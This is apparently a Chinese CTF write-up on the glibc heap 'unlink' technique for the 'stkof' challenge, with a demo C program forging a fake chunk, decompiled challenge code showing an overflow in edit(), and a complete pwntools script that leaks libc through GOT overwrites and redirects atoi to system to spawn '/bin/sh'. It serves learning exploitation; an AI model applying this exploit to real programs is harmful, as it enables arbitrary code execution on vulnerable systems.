stkof 程序下载:https://pan.baidu.com/s/1_dcm8OFjhKbKYWa3WBtAiQ

提取码:pkyb

unlink 基础操作

# define unlink
#define unlink(AV, P, BK, FD) {                                             \

    FD = P->fd;								      							\

    BK = P->bk;								     							\

    if (__builtin_expect (FD->bk != P || BK->fd != P, 0))		      		\

      malloc_printerr (check_action, "corrupted double-linked list", P, AV);\

    else {								      								\

        FD->bk = BK;							      						\

        BK->fd = FD;							   							\

        ...

	}

根据unlink的定义中, P BK FD 都是chunk .(上述代码中省略部分是 large bin 的,不好做利用,我不会)

unlink.c
#include<stdio.h>

#include<malloc.h>

#include<unistd.h>

#include<string.h>

long list;

int main(){

	char *p = malloc(0x80);

	char *q = malloc(0x80);

	char *r = malloc(0x80);

	list = p;

    printf("%p\n",p);

	*(long *)p = 0;

	*(long *)(p+8) = 0x81;

	//让下一个chunk释放时检测到这个从fd开始的假chunk已经被释放了

	*(long *)(p+16) = &list - 0x3;//FD

	*(long *)(p+24) = &list - 0x2;//BK

	*(long *)(q-16) = 0x80;

	*(long *)(q-8) = 0x90;

	//prev_size 为80,0x90 prev_inuser位表示前一个chunk已经被free

	free(q);

	//触发前向合并,移动指针 q -= priv_size

	strcpy(list,"aaaaaaaabbbbbbbbcccccccc\x38\x10\x60");

	strcpy(list,"dddddddd");

	//这两个strcpy是为了向0x601038位置写入'dddddddd'

	//利用方式:改got表  hook

    printf("%p\n",malloc(0));

	return 0;

}


$ gcc unlink.c

$./a.out

0xa64010

0xa64020
上述代码分析:
FD = P->fd;  |  FD -> bk == P  |  FD -> bk = BK

BK = P->bk;  |  BK -> fd == P  |  BK -> fd = FD

			 | unlink检查方式   | 断链的操作

---------------------------------------------------------------

prev_size	0  <==(p_chunk)

size		0x91

fd			0  <==p的指针

bk			0x81

  			&list-3	   prev_size <==(FD_chunk)

  			&list-2	   size       prve_size <==(BK_chunk)

    		&list-1	   fd	      size

    		list=p	   bk	      fd

最后一行 p==FD->bk==BK->fd

因为BK -> fd = FD 所以 list = &list-3 注: 新申请的内存也是在这个位置

free后还能被改,,真惨...不好,我好喜欢

好了,如果小白在上述代码分析中停留了3天,我就当你明白了

下面开始实战

__int64 __fastcall main(__int64 a1, char **a2, char **a3)

{

		...

  while ( fgets(&buf, 10, stdin) )

  {

    num = atoi(&buf);

    switch(num)

    {

        case 1: ret = add();

      			goto LABEL_14;

        case 2:ret = edit();

      		  	goto LABEL_14;

        case 3:ret = del();

        		goto LABEL_14;

        case 4:ret = show();

        	    goto LABEL_14;

    }

	...

}

signed __int64 add()

{

	...

  v4 = __readfsqword(0x28u);

  fgets(&s, 16, stdin);

  size = atoll(&s);

  v2 = (char *)malloc(size);

  if ( !v2 )

    return -1;

  bss_chunkS[++chunk_num] = v2;

  printf("%d\n", (unsigned int)chunk_num, size);

  return 0LL;

}

signed __int64 edit()

{

 ...

  fgets(&buf, 16, stdin);

  index = atol(&buf);

  if ( index > 0x100000 )

    return -1;

  if ( !bss_chunkS[index] )

    return -1;

  fgets(&buf, 16, stdin);

  n = atoll(&buf);

  ptr = bss_chunkS[index];

  for ( i = fread(ptr, 1uLL, n, stdin); i > 0; i = fread(ptr, 1uLL, n, stdin) )// 溢出

  {

    ptr += i;

    n -= i;

  }

...

}

signed __int64 del()

{

...

  fgets(&s, 16, stdin);

  index = atol(&s);

  if ( index > 0x100000 )

    return 0xFFFFFFFFLL;

  if ( !bss_chunkS[index] )

    return 0xFFFFFFFFLL;

  free(bss_chunkS[index]);

  bss_str[index] = 0LL;

  return 0LL;

}    

signed __int64 show()

{

...

  fgets(&s, 16, stdin);

  v1 = atol(&s);

  if ( v1 > 0x100000 )

    return -1;

  if ( !bss_chunkS[v1] )

    return 0xFFFFFFFFLL;

  if ( strlen(bss_chunkS[v1]) <= 3 )

    puts("//TODO");

  else

    puts("...");

  return 0LL;

}
利用代码
#!/usr/bin/env python

# -*- coding: UTF-8 -*-

from pwn import *

p = process("./stkof")

elf=ELF('./stkof')

libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')

def add(size):

    p.sendline('1')

    p.sendline(str(size))

    p.recvuntil('OK\n')

def edit(index,payload):

    p.sendline('2')

    p.sendline(str(index))

    p.sendline(str(len(payload)))

    p.sendline(payload)

    p.recvuntil('OK\n')

def delete(index):

    p.sendline('3')

    p.sendline(str(index))

add(0x80)     #此时的堆布局 1.printf 2.chunk1

add(0x20)     #             3.puts   4.chunk2

add(0x80)     #             5.chunk3 6.top_chunk

#我们不好将chunk1直接溢出到chunk2,但chunk2与chunk3是连续的

chunk_list=0x602140+0x10 #第2个chunk的指针

payload = p64(0)

payload += p64(0x21)

payload += p64(chunk_list - 0x18) #FD

payload += p64(chunk_list - 0x10) #BK

payload += p64(0x20)

payload += p64(0x90)

edit(2,payload)   

delete(3) #chunk_list=&chunk_list-0x18  FD

p.recvuntil('OK\n')

payload = p64(0)+ p64(elf.got['free'])

payload += p64(elf.got['puts']) + p64(elf.got['atoi'])

edit(2,payload)#idx2 这个位置 = &chunk_list-0x18

#当编辑完后,chunk2这个指针指向 atoi@got

payload = p64(elf.plt['puts'])

edit(0, payload) #free@got 改为指向 puts@plt

delete(1) #free@got->puts@plt(puts@got)

p.recvline()

puts_addr = u64(p.recvline()[:-1].ljust(8, '\x00'))

system = puts_addr - libc.symbols['puts'] + libc.symbols['system']

edit(2,p64(system)) #atoi@got->system addr

p.sendline('/bin/sh')

p.recvuntil('FAIL\n')

p.interactive()

通过这此的题,我发现自己对malloc free的源码的理解程度严重不足,这题我足足做了3天,我还是闭关研究一下源码吧..

unlink- ctf-stkof的更多相关文章

  1. [CTF]Heap vuln -- unlink

    0x00: 起因 一直在堆的漏洞利用中不得要领,之前ZCTF又是三个堆的利用,血崩,chxx表哥给写了一个heap的pwn,学习学习. 0x01: 关于heap的unlink的漏洞利用,出的很早,在低 ...

  2. linux下堆溢出unlink的一个简单例子及利用

    最近认真学习了下linux下堆的管理及堆溢出利用,做下笔记:作者作为初学者,如果有什么写的不对的地方而您又碰巧看到,欢迎指正. 本文用到的例子下载链接https://github.com/ctfs/w ...

  3. 如何在CTF中当搅屎棍

    论如何在CTF比赛中搅屎 0×00 前言 不能搅屎的CTF不是好CTF,不能搅屎的题目不是好题目. 我很赞成phithon神的一句话,"比赛就是和他人竞争的过程,通过各种手段阻止对手拿分我觉 ...

  4. Unlink——2016 ZCTF note2解析

    简介 Unlink是经典的堆漏洞,刚看到这个漏洞不知道如何实现任意代码执行,所以找了一个CTF题,发现还有一些细节的地方没有讲的很清楚,题目在这里.自己也动手写一遍,体验一下 题目描述 首先,我们先分 ...

  5. CTF中做Linux下漏洞利用的一些心得

    其实不是很爱搞Linux,但是因为CTF必须要接触一些,漏洞利用方面也是因为CTF基本都是linux的pwn题目. 基本的题目分类,我认为就下面这三种,这也是常见的类型. 下面就分类来说说 0x0.栈 ...

  6. ctf经典好题复习

    WEB200-2 这是swpu-ctf的一道题. <?php if(isset($_GET['user'])){ $login = @unserialize(base64_decode($_GE ...

  7. CTF AWD模式攻防Note

    ###0x01 AWD模式 Attack With Defence,简而言之就是你既是一个hacker,又是一个manager.比赛形式:一般就是一个ssh对应一个web服务,然后flag五分钟一轮, ...

  8. CTF辅助脚本

    首先推荐这篇文章,网上有多次转载,这是我见过日期比较早的 CTF中那些脑洞大开的编码和加密 凯撒密码 flag='flag{abcdef}' c='' n=20 for i in flag: if ' ...

  9. CTF基础知识 && AWD红蓝对抗

    AWD 备份源码,修改账户密码,查看是否有预留后门然后删掉 修改mysql密码 格式:mysqladmin -u用户名 -p旧密码 password 新密码 例子:mysqladmin -uroot ...

  10. CTF中的AWD套路

    今年参加了三起CTF比赛,属于初学者,基本除了web其他的不会,但分赛场AWD相对就没什么难度,基本都是技巧性.其中一场进入复赛了,本月底再次比赛(ctf题做的这么渣还能进也是绝了~),参照前人经验补 ...

随机推荐

  1. 006-saltstack之远程执行

    1.目标 2.执行模块 3.返回 salt ‘*’ cmd.run ‘uptime’ 命令 目标 执行模块 执行模块参数 1.SlatStack远程执行–目标 执行目标:https://docs.sa ...

  2. Jmeter之cookie的处理方式,token处理

    cookie是什么 由于http是无状态的协议,一旦客户端和服务器的数据交换完毕,就会断开连接,再次请求,会重新连接,这就说明服务器单从网络连接上是没有办法知道用户身份的.怎么办呢?那就给每次新的用户 ...

  3. php函数nl2br的反函数br2nl 将html中的br换行符转换为文本输入中的换行符

    下面这几个方法将能够帮你解决这个问题. PHP版将html中的<br />换行符转换为文本框中的换行符: 代码如下: function br2nl($text){ return preg_ ...

  4. ajax 请求成功,但是后台feigin请求超时解决方案

    ========后台请求数据时间较长,报feigin超时错误====== fegin报错如下: feign.RetryableException: Read timed out executing P ...

  5. 浅谈MySQL存储引擎选择 InnoDB还是MyISAM

    如果是一些小型的应用或项目,那么MyISAM 也许会更适合.当然,在大型的环境下使用MyISAM 也会有很大成功的时候,但却不总是这样的.如果你正在计划使用一个超大数据量的项目,那么你应该直接使用In ...

  6. 2017年全国卷3的21题与2018年全国卷3的21题命题背景是同一个函数$y=\frac{2x}{\ln(x+1)}$(再次瞎谈)

    2017年四川高考数学(全国卷3)理科21题第1问 已知函数\(f(x)=x-1-a\ln x\) (1)若\(f(x)\geqslant 0\),求\(a\)的值\(.\) 该不等式等价于$a\ln ...

  7. SpirngBoot之整合邮件服务

    一.集成邮件服务 1.1 获取客户端授权码 1.2 引入依赖 <dependencies> ...... <dependency> <groupId>org.spr ...

  8. 【HDU5289】Assignment

    题目大意:给定一个长度为 N 的序列,求序列中最大值和最小值相差小于 K 的连续段的个数. 题解: 最大值和最小值相差不超过 K 是一个在值域角度的限制,应考虑采用平衡树或权值...数据结构进行维护. ...

  9. java 死锁演示

    java 死锁演示 java死锁 模拟死锁生成 死锁是由多个线程竞争同一个资源导致 package com.feshfans; /** * 1. 本代码为展示 java 中死锁的产生 * 2. 死锁的 ...

  10. 随笔记录①—利用poi读取Word中的标题和内容

    使用时间:4小时 使用poi方法将word中的内容提取出来,并输出到控制台或者存储到数据库poi.jar下载地址:https://www.apache.org/dyn/closer.lua/poi/r ...